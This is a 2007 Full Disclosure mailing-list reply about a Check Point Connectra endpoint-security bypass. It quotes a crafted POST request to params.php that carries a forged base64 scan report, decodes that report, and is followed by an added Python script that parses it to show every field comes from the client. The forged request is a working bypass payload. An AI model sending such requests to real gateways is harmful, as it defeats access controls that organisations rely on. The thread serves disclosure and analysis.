Full Disclosure mailing list archives

Re: Check Point Connectra End Point security bypass
From: Felix Lindner <fx () sabre-labs com>
Date: Mon, 22 Jan 2007 14:19:51 +0100

Hi,

On Mon, 22 Jan 2007 07:37:29 +0200
"Roni Bachar" <roni () avnet co il> wrote:
> The vulnerability can be exploited by doing the following stages:
>
> Sending a post request as follows:
>
> POST https://serverip/sre/params.php HTTP/1.1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: ICS_Secure
> Host: serverip
> Content-Length: 251
> Cache-Control: no-cache
> Cookie: ICS_Test_Cookie=1
>
> Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
> TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
> WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
> 1NyZVNjYW5SZXBvcnQ+Cg==

I assume you meant to say that the Base64-encoded data in the Report variable
must be adjusted to reflect the actual hostname etc., or is params.php
accepting _any_ report that looks reasonably valid?

For reference, the decoded data in this example is:

<?xml version="1.0"?>

<SreScanReport Version="3.7.116.0">
        <UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and Settings\roni.LENOVO-4FFEF4E3"/>
</SreScanReport>

cheers
FX

-- 
SABRE Labs GmbH            | Felix 'FX' Lindner <fx () sabre-labs com> 
http://www.sabre-labs.com  | GSM: +49 171 7402062
Wrangelstrasse 4           | PGP: A740 DE51 9891 19DF 0D05  
10997 Berlin, Germany      |      13B3 1759 C388 C92D 6BBB
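
The decoding step FX refers to, as an added Python example that is not part of the original post or of any Check Point code: it takes the form body of the quoted request (reconstructed here from the four base64 lines), base64-decodes the Report parameter and parses the SreScanReport XML into its fields, which makes visible that every value the server receives is client-supplied. The field names are the ones in the decoded XML above; the function names are my own.

```python
import base64
import xml.etree.ElementTree as ET

# Form body of the POST quoted in the thread, constructed by joining the four
# base64 lines of the message. Note that the '+' inside the value is sent raw,
# not percent-encoded as %2B.
POST_BODY = (
    "Report="
    "PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM"
    "TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y"
    "WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L"
    "1NyZVNjYW5SZXBvcnQ+Cg=="
)


def report_xml(body: str) -> str:
    """Extract the Report parameter from a form body and base64-decode it.

    The value is taken verbatim instead of being form-decoded, because the
    quoted request does not percent-encode the '+' characters of the base64
    text and a form decoder would turn them into spaces.
    """
    for field in body.split("&"):
        name, sep, value = field.partition("=")
        if sep and name == "Report":
            return base64.b64decode(value, validate=True).decode("utf-8")
    raise ValueError("no Report parameter in body")


def report_fields(body: str) -> dict:
    """Parse the decoded SreScanReport and return its fields as a dict.

    Every value here (product version, Windows user, profile path) originates
    on the client, which is why the thread asks whether params.php checks the
    report against anything it knows independently.
    """
    root = ET.fromstring(report_xml(body))
    if root.tag != "SreScanReport":
        raise ValueError(f"unexpected root element {root.tag!r}")
    user = root.find("UserInfo")
    if user is None:
        raise ValueError("report has no UserInfo element")
    return {
        "Version": root.get("Version"),
        "WinDomain": user.get("WinDomain"),
        "WinUser": user.get("WinUser"),
        "WinUserCatalog": user.get("WinUserCatalog"),
    }


if __name__ == "__main__":
    print(report_xml(POST_BODY))
    print(report_fields(POST_BODY))
```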

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/